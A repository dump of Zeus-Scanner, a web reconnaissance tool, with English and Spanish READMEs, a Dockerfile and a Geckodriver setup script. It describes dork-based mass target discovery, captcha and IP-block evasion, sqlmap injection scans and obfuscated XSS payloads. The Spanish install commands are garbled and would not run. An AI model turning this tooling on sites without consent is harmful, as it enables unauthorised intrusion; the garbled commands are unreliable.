5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Directorio de enlaces útiles
9 |
10 | - [Qué es Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Funciones de Zeus](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Requisitos e instalación](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 | - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 | - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 | - [otro](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Capturas de pantalla](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [Video de demostración](https://vimeo.com/239885768)
18 | - [Manual de usuario](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 | - [Cómo funciona Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 | - [Funcionalidad](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 | - [Pasando banderas sqlmap con Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Información legal](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 | - [Licencia (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 | - [Código de conducta](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Informar de un error](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Abrir solicitud de extracción](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [Directrices de contribución](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Donaciones a Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-Scanner
32 |
33 | ### ¿Qué es Zeus?
34 |
35 | Zeus es una utilidad de reconocimiento avanzada diseñada para hacer que el reconocimiento de aplicaciones web sea simple. Zeus viene completo con un poderoso motor de análisis integrado de URL, compatibilidad con múltiples motores de búsqueda, la capacidad de extraer URL de las URL de prohibición y de caché web, la capacidad de ejecutar múltiples evaluaciones de vulnerabilidad en el objetivo y puede eludir los captchas de los motores de búsqueda.
36 |
37 | ### Caracteristicas
38 |
39 | - Un potente motor de análisis de URL incorporado
40 | - La compatibilidad con múltiples motores de búsqueda (`DuckDuckGo`,` AOL`, `Bing` y` Google` por defecto es `Google`
41 | - Posibilidad de extraer la URL de la URL de prohibición de Google evitando así los bloques de IP
42 | - Posibilidad de extraer de la URL de caché web de Google
43 | - Compatibilidad proxy (`http`,` https`, `socks4`,` socks5`
44 | - Compatibilidad Tor proxy y emulación de navegador Tor
45 | - Parse `robots.txt` /` sitemap.xml` y guárdelos en un archivo
46 | - Múltiples evaluaciones de vulnerabilidad (XSS, SQLi, clickjacking, escaneo de puertos, hallazgos de panel de administración, búsquedas de whois, y más)
47 | - Guiones de sabotaje para ofuscar cargas útiles XSS
48 | - Se puede ejecutar con un agente de usuario predeterminado personalizado, uno de los más de 4000 agentes de usuario aleatorios o un agente de usuario personal
49 | - Creación automática de problemas cuando surge un error inesperado
50 | - Posibilidad de rastrear una página web y extraer todos los enlaces
51 | - Puede ejecutar un dork singular, múltiples dorks en un archivo determinado, o un dork aleatorio de una lista de más de 5000 dorks cuidadosamente investigados
52 | - Lista negra de Dork cuando no se encuentran sitios con la consulta de búsqueda, guardará la consulta en un archivo de lista negra
53 | - Identificar la protección WAF / IPS / IDS de más de 20 firewalls diferentes
54 | - Enumeración de protección de encabezado para verificar qué tipo de protección se proporciona a través de encabezados HTTP
55 | - Guardar cookies, encabezados y otra información vital para registrar archivos
56 | - y mucho más...
57 |
58 | ### Capturas de pantalla
59 |
60 | Si ejecuta sin opciones obligatorias o si ejecuta el indicador `--help`, se mostrará el menú de ayuda de Zeus:
61 | ! [zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 | Un escaneo de dork básico con la bandera `-d`, del dork dado lanzará un navegador automatizado y extraerá los resultados de la página de Google:
63 | ! [zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
64 | Llamar al indicador `-s` le pedirá que inicie el servidor de la API sqlmap` python sqlmapapi.py -s` desde sqlmap, luego se conectará a la API y realizará un análisis de sqlmap en la URL encontrada.
65 | ! [zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
66 |
67 | Puede ver más capturas de pantalla [aquí](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
68 |
69 | ### Demo
70 |
71 | [
72 | ](https://vimeo.com/239885768)
73 |
74 | ### Requisitos
75 |
76 | Hay algunos requisitos para que esto se ejecute con éxito.
77 |
78 | ##### Requerimientos básicos
79 |
80 | - `libxml2-dev`,` libxslt1-dev`, `python-dev` son necesarios para el proceso de instalación
81 | - Se requiere navegador web Firefox a partir de ahora, necesitarás la versión de Firefox `<= 57> = 51` (entre 51 y 57). Se agregará la funcionalidad completa para otros navegadores.
82 | - Si desea ejecutar sqlmap a través de la URL, necesitará sqlmap en algún lugar de su sistema.
83 | - Si desea ejecutar un escaneo de puertos usando nmap en las direcciones IP de la URL. Necesitarás nmap en tu sistema.
84 | - [Geckodriver](https://github.com/mozilla/geckodriver) es necesario para ejecutar el navegador web firefox y se instalará la primera vez que ejecute. Se agregará a su `/ usr / bin` para que pueda ejecutarse en su ENV PATH.
85 | - Debe ser `sudo` por primera vez ejecutando esto para que pueda agregar el controlador a su RUTA, también puede necesitar ejecutar como` sudo` dependiendo de sus permisos. _NOTA: _`Dependiendo de los permisos, puede que necesite sudo para cualquier ejecución que involucre al geckodriver`
86 | - `xvfb` es requerido por` pyvirtualdisplay`, se instalará si no está instalado en su primera ejecución
87 |
88 | ##### Requisitos del paquete de Python
89 |
90 | - Se requiere el paquete [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) para automatizar el navegador web y eludir las llamadas API.
91 | - Se requiere el paquete [requests](http://docs.python-requests.org/en/master/) para conectarse a la URL y a la API de sqlmap.
92 | - Se requiere el paquete [python-nmap](http://xael.org/pages/python-nmap-en.html) para ejecutar nmap en las direcciones IP de la URL
93 | - El paquete [witchcraft](https://github.com/spookyowl/witchcraft) es necesario para verificar si nmap y sqlmap están en su sistema si desea usarlos
94 | - Se requiere el paquete [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) para ocultar la visualización del navegador mientras se encuentra la URL de búsqueda
95 | - [lxml](https://lxml.readthedocs.io/en/latest/) es necesario para analizar los datos XML del mapa del sitio y guardarlo como tal
96 | - [psutil](https://github.com/giampaolo/psutil) es necesario para buscar ejecutar sesiones API de sqlmap
97 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) es necesario para extraer todas las etiquetas de descriptor HREF y analizar el HTML en una sintaxis fácil de usar
98 |
99 | ### Instalación
100 |
101 | Puede descargar la última [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), la última [zip](https://github.com/ekultek/zeus-scanner/zipball/master), o puede encontrar la versión estable actual [aquí](https://github.com/Ekultek/Zeus-Scanner/releases). Alternativamente, puede instalar la última versión de desarrollo siguiendo las instrucciones que mejor se adapten a su sistema operativo:
102 |
103 | **_NOTA: (opcional pero muy recomendable)_ ** agregue sqlmap y nmap a su RUTA del entorno moviéndolos a `/usr/bin` o agregándolos a la RUTA a través de la terminal
104 |
105 | ##### Ubuntu / Debian
106 |
107 | ```
108 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clon https://github.com/ekultek/zeus-scanner.git y& cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus .py
109 | ```
110 |
111 | ##### centOS
112 |
113 | ```
114 | sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clon https://github.com/ekultek/zeus-scanner.git y& cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
115 | ```
116 |
117 | ##### Otros
118 |
119 | ```
120 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clon https://github.com/ekultek/zeus-scanner.git y& cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus .py
121 | ```
122 |
123 | Esto instalará todos los requisitos del paquete junto con el geckodriver
124 |
125 | ### Donaciones
126 |
127 | Zeus es creado por un pequeño equipo de desarrolladores que aspiran a la seguridad de la información y se esfuerzan por tener éxito. Si te gusta Zeus y quieres donar a nuestra financiación, agradecemos y agradecemos las donaciones a través de:
128 |
129 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
130 | - [PayPal](https://www.paypal.me/ZeusScanner)
131 | - O puedes [Cómpranos un café](https://ko-fi.com/A28355P5)
132 |
133 | Puede estar seguro de que todas las donaciones se destinarán a la financiación de Zeus para que sea más confiable e incluso mejor, gracias del equipo de desarrollo de Zeus.
134 |
135 | ### Shoutsouts
136 |
137 | ##### [Proyectos de OpenSource](https://www.facebook.com/opensourceprojects/)
138 |
139 | OpenSource Projects es una página de la comunidad de Facebook cuyo objetivo es brindar a los desarrolladores, nuevos y antiguos, un lugar fácil y simple para compartir sus contribuciones y proyectos de código abierto. Personalmente creo que esta es una idea increíble, sé lo difícil que es hacer que la gente note su código y apoyar a estos tipos al 100%. Continúa y dales un me gusta [aquí](https://www.facebook.com/opensourceprojects/). Compartirán cualquier proyecto de código abierto que les envíe de forma gratuita. ¡Gracias OpenSource Projects por darles a los desarrolladores un lugar para compartir el trabajo entre ellos!
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | test.py
2 | log/
3 | geckodriver.log
4 | *.pyc
5 | .idea/
6 | bin/executed.txt
7 | bin/paths
8 | bin/version_info
9 | bin/__pycache__/
10 | lib/__pycache__/
11 | lib/attacks/__pycache__/
12 | lib/attacks/admin_panel_finder/__pycache__/
13 | etc/deprecated/intel_me/__pycache__/
14 | lib/attacks/nmap_scan/__pycache__/
15 | lib/attacks/sqlmap_scan/__pycache__/
16 | lib/attacks/whois_lookup/__pycache__/
17 | lib/attacks/xss_scan/__pycache__/
18 | lib/core/__pycache__/
19 | var/__pycache__/
20 | var/auto_issue/__pycache__/
21 | var/blackwidow/__pycache__/
22 | var/search/__pycache__/
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:18.10
2 |
3 | WORKDIR /app
4 |
5 | RUN apt update && \
6 | apt install -y \
7 | libxml2-dev \
8 | libxslt1-dev \
9 | libgtk-3-dev \
10 | libdbus-glib-1-2 \
11 | python-dev \
12 | python-pip \
13 | git \
14 | curl \
15 | nmap \
16 | sqlmap \
17 | xvfb \
18 | && rm -rf /var/lib/apt/lists/*
19 |
20 | ARG GECKO_DRIVER_VERSION=0.23.0
21 | ARG FIREFOX_VERSION=58.0.2
22 |
23 | RUN git clone https://github.com/ekultek/zeus-scanner.git . && \
24 | pip install -r requirements.txt
25 |
26 | RUN curl -L https://github.com/mozilla/geckodriver/releases/download/v${GECKO_DRIVER_VERSION}/geckodriver-v${GECKO_DRIVER_VERSION}-linux64.tar.gz | tar xz -C /usr/bin
27 |
28 | RUN curl -L https://ftp.mozilla.org/pub/firefox/releases/${FIREFOX_VERSION}/linux-$(uname -m)/en-US/firefox-${FIREFOX_VERSION}.tar.bz2 -o firefox.tar.bz2 && \
29 | tar xjf firefox.tar.bz2 -C /opt && \
30 | rm firefox.tar.bz2 && \
31 | ln -s /opt/firefox/firefox /usr/bin/firefox
32 |
33 | CMD ["python", "zeus.py"]
34 |
35 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | **_NOTE: due to dumbass people, automatic issue creation has been turned off until further notice_**
2 |
3 | ----
4 |
5 | [](https://github.com/ekultek/zeus-scanner/stargazers)
6 | [](https://github.com/ekultek/zeus-scanner/network)
7 | [](https://github.com/ekultek/zeus-scanner/issues)
8 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
9 | [](https://twitter.com/stay__salty)
10 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
11 |
12 | # Helpful links directory
13 |
14 | - [Translations](https://github.com/Ekultek/Zeus-Scanner#translations)
15 | - [What is Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
16 | - [Zeus's features](https://github.com/Ekultek/Zeus-Scanner#features)
17 | - [Requirements and installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
18 | - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
19 | - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
20 | - [Backbox](https://github.com/Ekultek/Zeus-Scanner#backbox)
21 | - [other](https://github.com/Ekultek/Zeus-Scanner#others)
22 | - [Screenshots](https://github.com/Ekultek/Zeus-Scanner#screenshots)
23 | - [Demo video](https://vimeo.com/239885768)
24 | - [User manual](https://github.com/Ekultek/Zeus-Scanner/wiki)
25 | - [How Zeus works](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
26 | - [Functionality](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
27 | - [Passing sqlmap flags with Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
28 | - [Legal information](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
29 | - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
30 | - [Code of conduct](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
31 | - [Report a bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
32 | - [Open a pull request](https://github.com/Ekultek/Zeus-Scanner/compare)
33 | - [Contribution guidelines](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
34 | - [Donations to Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
35 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
36 |
37 | # Zeus-Scanner
38 |
39 | ### What is Zeus?
40 |
41 | Zeus is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
42 |
43 | ### Features
44 |
45 | - A powerful built in URL parsing engine
46 | - Multiple search engine compatibility (`DuckDuckGo`, `AOL`, `Bing`, and `Google` default is `Google`)
47 | - Ability to extract the URL from Google's ban URL thus bypassing IP blocks
48 | - Ability to extract from Google's webcache URL
49 | - Proxy compatibility (`http`, `https`, `socks4`, `socks5`)
50 | - Tor proxy compatibility and Tor browser emulation
51 | - Parse `robots.txt`/`sitemap.xml` and save them to a file
52 | - Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
53 | - Tamper scripts to obfuscate XSS payloads
54 | - Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
55 | - Automatic issue creation when an unexpected error arises
56 | - Ability to crawl a webpage and pull all the links
57 | - Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
58 | - Dork blacklisting when no sites are found with the search query, will save the query to a blacklist file
59 | - Identify WAF/IPS/IDS protection of over 20 different firewalls
60 | - Header protection enumeration to check what kind of protection is provided via HTTP headers
61 | - Saving cookies, headers, and other vital information to log files
62 | - and much more...
63 |
64 | ### Screenshots
65 |
66 | Running without a mandatory options, or running the `--help` flag will output Zeus's help menu:
67 | 
68 | A basic dork scan with the `-d` flag, from the given dork will launch an automated browser and pull the Google page results:
69 | 
70 | Calling the `-s` flag will prompt for you to start the sqlmap API server `python sqlmapapi.py -s` from sqlmap, it will then connect to the API and perform a sqlmap scan on the found URL's.
71 | 
72 |
73 | You can see more screenshots [here](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
74 |
75 | ### Demo
76 |
77 | [
78 | ](https://vimeo.com/239885768)
79 |
80 | ### Requirements
81 |
82 | There are some requirements for this to be run successfully.
83 |
84 | ##### Basic requirements
85 |
86 | - `libxml2-dev`, `libxslt1-dev`, `python-dev` are required for the installation process
87 | - Firefox web browser is required as of now, you will need Firefox version `<=58 >=52` (between 52 and 58). Full functionality for other browsers will eventually be added.
88 | - If you want to run sqlmap through the URL's you will need sqlmap somewhere on your system.
89 | - If you want to run a port scan using nmap on the URL's IP addresses. You will need nmap on your system.
90 | - [Geckodriver](https://github.com/mozilla/geckodriver) is required to run the firefox web browser and will be installed the first time you run. It will be added to your `/usr/bin` so that it can be run in your ENV PATH.
91 | - You must be `sudo` for the first time running this so that you can add the driver to your PATH, you also may need to run as `sudo` depending on your permissions. _NOTE:_ `Depending on permissions you may need to be sudo for any run involving the geckodriver`
92 | - `xvfb` is required by `pyvirtualdisplay`, it will be installed if not installed on your first run
93 |
94 | ##### Python package requirements
95 |
96 | - [selenium-webdriver](http://www.seleniumhq.org/projects/webdriver/) package is required to automate the web browser and bypass API calls.
97 | - [requests](http://docs.python-requests.org/en/master/) package is required to connect to the URL, and the sqlmap API
98 | - [python-nmap](http://xael.org/pages/python-nmap-en.html) package is required to run nmap on the URL's IP addresses
99 | - [whichcraft](https://github.com/spookyowl/witchcraft) package is required to check if nmap and sqlmap are on your system if you want to use them
100 | - [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/) package is required to hide the browser display while finding the search URL
101 | - [lxml](https://lxml.readthedocs.io/en/latest/) is required to parse XML data for the sitemap and save it as such
102 | - [psutil](https://github.com/giampaolo/psutil) is required to search for running sqlmap API sessions
103 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) is required to pull all the HREF descriptor tags and parse the HTML into an easily workable syntax
104 |
105 | ### Installation
106 |
107 | You can download the latest [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master), the latest [zip](https://github.com/ekultek/zeus-scanner/zipball/master), or you can find the current stable release [here](https://github.com/Ekultek/Zeus-Scanner/releases/tag/v1.5). Alternatively you can install the latest development version by following the instructions that best match your operating system:
108 |
109 | **_NOTE: (optional but highly advised)_** add sqlmap and nmap to your environment PATH by moving them to `/usr/bin` or by adding them to the PATH via terminal
110 |
111 | ##### Ubuntu/Debian
112 |
113 | ```
114 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
115 | ```
116 |
117 | ##### centOS
118 |
119 | ```
120 | sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
121 | ```
122 |
123 | #### Backbox
124 |
125 | 64 bit installation:
126 | ```
127 | sudo -s << EOF
128 | aptitude purge firefox
129 | wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-x86_64/en-US/firefox-57.0.tar.bz2
130 | tar -xjf firefox-57.0.tar.bz2
131 | rm -rf /opt/firefox*
132 | mv firefox /opt/firefox57
133 | mv /usr/bin/firefox /usr/bin/firefoxold
134 | ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
135 | apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
136 | EOF
137 | ```
138 |
139 | 32 bit installation:
140 | ```
141 | sudo -s << EOF
142 | aptitude purge firefox
143 | wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-i686/en-US/firefox-57.0.tar.bz2
144 | tar -xjf firefox-57.0.tar.bz2
145 | rm -rf /opt/firefox*
146 | mv firefox /opt/firefox57
147 | mv /usr/bin/firefox /usr/bin/firefoxold
148 | ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
149 | apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
150 | EOF
151 | ```
152 |
153 | ##### Others
154 |
155 | ```
156 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
157 | ```
158 |
159 | This will install all the package requirements along with the geckodriver
160 |
161 |
162 | ### Donations
163 |
164 | Zeus is created by a small team of developers that have an aspiration for information security and a strive to succeed. If you like Zeus and want to donate to our funding, we gladly and appreciatively accept donations via:
165 |
166 | - Bitcoin(BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
167 | - [PayPal](https://www.paypal.me/ZeusScanner)
168 | - Or you can [Buy us a coffee](https://ko-fi.com/A28355P5)
169 |
170 | You can be assured that all donations will go towards Zeus funding to make it more reliable and even better, thank you from the Zeus development team
171 |
172 | ### Shoutouts
173 |
174 | ##### [OpenSource Projects](https://www.facebook.com/opensourceprojects/)
175 |
176 | OpenSource Projects is a Facebook community page who's goal is to give developers, new and old, a easy and simple place to share their opensource contributions and projects. I personally think this is an awesome idea, I know how hard it is to get your code noticed by people and support these guys 100%. Go ahead and give them a like [here](https://www.facebook.com/opensourceprojects/). They will share any opensource project you send them for free. Thank you OpenSource Projects for giving developers a place to share work with one another!
177 |
178 |
179 | ### Translations
180 |
181 | - [Spanish](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-spanish.md)
182 | - [Russian](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-russian.md)
183 | - [French](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/translations/README-french.md)
184 |
--------------------------------------------------------------------------------
/bin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/__init__.py
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.17.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.17.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.17.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.17.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.18.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.18.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.18.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.18.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.19.0-linux32.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.19.0-linux32.tar.gz
--------------------------------------------------------------------------------
/bin/drivers/geckodriver-v0.19.0-linux64.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/bin/drivers/geckodriver-v0.19.0-linux64.tar.gz
--------------------------------------------------------------------------------
/bin/unzip_gecko.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 | import shlex
5 | import platform
6 | import threading
7 | import subprocess
8 | import tarfile
9 | try:
10 | import ConfigParser # python 2
11 | except ImportError:
12 | import configparser as ConfigParser # python 3
13 |
14 | import whichcraft
15 |
16 | import lib.core.common
17 | import lib.core.settings
18 |
19 |
20 | stop_animation = False
21 | xvfb_path = "{}/etc/scripts/install_xvfb.sh".format(os.getcwd())
22 |
23 |
24 | def animation(text):
25 | global stop_animation
26 | i = 0
27 | while not stop_animation:
28 | temp_text = list(text)
29 | if i >= len(temp_text):
30 | i = 0
31 | temp_text[i] = temp_text[i].upper()
32 | temp_text = ''.join(temp_text)
33 | sys.stdout.write("\033[92m{}\r\033[0m".format(temp_text))
34 | sys.stdout.flush()
35 | i += 1
36 | time.sleep(0.1)
37 | else:
38 | pass
39 |
40 |
41 | def disclaimer():
42 | question = raw_input(
43 | "\033[91mAttacking targets without consent is not only illegal, but it "
44 | "is unethical and frowned upon in most countries. By installing this "
45 | "program you are agreeing that you are responsible for your own actions, "
46 | "you are over the age of 18 or legally considered an adult in your "
47 | "place of origin, and that you will obey all laws, regulations, and "
48 | "rules set forth by your place of origin. You will only see this disclaimer "
49 | "once. If you agree to the conditions type 'yes'...\033[0m"
50 | )
51 | if question.upper() == "YES":
52 | return True
53 | else:
54 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
55 | "you have not agreed with the terms of service, so "
56 | "Zeus will shut down now", level=50
57 | ))
58 | return False
59 |
60 |
61 | def parse_hosts(filepath="/etc/hosts"):
62 | to_append = "127.0.0.1\tlocalhost"
63 | appened = False
64 | with open(filepath, "a+") as etc:
65 | for line in etc:
66 | if line.strip() == to_append:
67 | appened = True
68 | if not appened:
69 | etc.seek(0)
70 | etc.write(to_append + "\n")
71 |
72 |
73 | def find_tools(to_search=("sqlmap", "nmap"), directory="{}/bin/paths", filename="path_config.ini"):
74 | global stop_animation
75 |
76 | lib.core.settings.create_dir(directory.format(os.getcwd()))
77 | full_path = "{}/{}".format(
78 | directory.format(os.getcwd()),
79 | filename
80 | )
81 | cfgfile = open(full_path, "a+")
82 | parser = ConfigParser.ConfigParser()
83 | path_schema = {}
84 | for item in to_search:
85 | path_obj = whichcraft.which(item)
86 | if path_obj is not None:
87 | path_schema[item] = path_obj
88 | else:
89 | path_schema[item] = None
90 | for key, value in path_schema.iteritems():
91 | if value is None:
92 | stop_animation = True
93 | print("\n")
94 | provided_path = lib.core.common.prompt(
95 | "what is the full path to {} on your system".format(key)
96 | )
97 | path_schema[key] = provided_path
98 | for program, path in path_schema.iteritems():
99 | parser.add_section(program)
100 | parser.set(program, "path", path)
101 | parser.write(cfgfile)
102 | cfgfile.close()
103 |
104 |
105 | def config_gecko_version(browser_version):
106 | """
107 | figure out which gecko version you need
108 | """
109 | version_specs = {
110 | (57, 58): 19,
111 | (56, 55, 54): 18,
112 | (53, 52): 17
113 | }
114 | if isinstance(browser_version, (tuple, list, set)):
115 | major = browser_version[0]
116 | for key in version_specs.keys():
117 | for num in key:
118 | if num == major:
119 | return version_specs[key]
120 | else:
121 | if "." in browser_version:
122 | major = browser_version.split(".")[0]
123 | else:
124 | major = browser_version
125 | for key in version_specs.keys():
126 | for num in key:
127 | if num == int(major):
128 | return version_specs[key]
129 |
130 |
131 | def check_os(current=platform.platform()):
132 | """
133 | check the users operating system..
134 | """
135 | if "linux" in str(current).lower():
136 | return True
137 | return False
138 |
139 |
140 | def check_xvfb(exc="Xvfb"):
141 | """
142 | test for xvfb on the users system
143 | """
144 | global xvfb_path
145 | global stop_animation
146 | if whichcraft.which(exc) is None:
147 | cmd = shlex.split("sudo sh {}".format(xvfb_path))
148 | subprocess.call(cmd)
149 | stop_animation = True
150 |
151 | else:
152 | return True
153 |
154 |
155 | def check_if_run(file_check="{}/bin/executed.txt"):
156 | """
157 | check if the application has been run before by reading the executed.txt file
158 | """
159 | if os.path.isfile(file_check.format(os.getcwd())):
160 | with open(file_check.format(os.getcwd())) as exc:
161 | if "FALSE" in exc.read():
162 | return True
163 | return False
164 | else:
165 | with open(file_check.format(os.getcwd()), "a+") as exc:
166 | exc.write("FALSE")
167 | return True
168 |
169 |
170 | def untar_gecko(filename="{}/bin/drivers/geckodriver-v0.{}.0-linux{}.tar.gz"):
171 | """
172 | untar the correct gecko driver for your computer architecture
173 | """
174 | global stop_animation
175 |
176 | arch_info = {"64bit": "64", "32bit": "32"}
177 | file_arch = arch_info[platform.architecture()[0]]
178 | ff_version = lib.core.settings.get_browser_version(output=False)
179 | if isinstance(ff_version, str) or ff_version is None:
180 | stop_animation = True
181 | ff_version = lib.core.common.prompt(
182 | "enter your firefox browser version (if you don't know it run firefox --version)"
183 | )
184 | gecko_version = config_gecko_version(ff_version)
185 | if gecko_version is None:
186 | stop_animation = True
187 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
188 | "your current firefox version is not supported by Zeus", level=50
189 | ))
190 | lib.core.common.shutdown()
191 | gecko_full_filename = filename.format(os.getcwd(), gecko_version, file_arch)
192 | with open(lib.core.settings.GECKO_VERSION_INFO_PATH, "a+") as log:
193 | log.write(gecko_full_filename.split("/")[-1])
194 | tar = tarfile.open(filename.format(os.getcwd(), gecko_version, file_arch), "r:gz")
195 | try:
196 | tar.extractall("/usr/bin")
197 | except IOError as e:
198 | if "Text file busy" in str(e):
199 | tar.close()
200 | pass
201 | except Exception as e:
202 | if "[Errno 13] Permission denied: '/usr/bin/geckodriver'" in str(e):
203 | lib.core.settings.logger.exception(lib.core.settings.set_color(
204 | "first run must be ran as root (sudo python zeus.py)", level=50
205 | ))
206 | else:
207 | lib.core.settings.logger.exception(lib.core.settings.set_color(
208 | "ran into exception '{}', logged to current log file".format(e), level=50
209 | ))
210 | exit(-1)
211 | tar.close()
212 |
213 |
214 | def ensure_placed(item="geckodriver", verbose=False):
215 | """
